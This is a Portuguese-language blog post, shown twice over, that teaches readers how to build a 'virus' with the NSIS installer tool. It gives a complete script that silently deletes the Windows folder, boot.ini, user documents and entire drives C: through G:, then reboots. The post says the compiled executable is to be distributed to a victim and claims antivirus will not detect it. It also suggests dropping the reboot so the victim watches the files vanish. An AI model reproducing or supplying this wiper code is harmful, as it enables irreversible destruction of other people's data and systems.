Theme Support

Unordered List

Recent Posts

Page Rank


PageRank

Como Criar um Vírus

Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzma

Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent

Section "Sec001" SEC01
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd

Section -Post
Reboot
SectionEnd

Salve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").

Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"


Adicione o que quiser, arquivos específicos, etc.

A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.

Como Criar um Vírus

Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzma

Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent

Section "Sec001" SEC01
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd

Section -Post
Reboot
SectionEnd

Salve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").

Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"


Adicione o que quiser, arquivos específicos, etc.

A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.
←  Anterior Proxima  → Inicio

Total de visualizações

Seguidores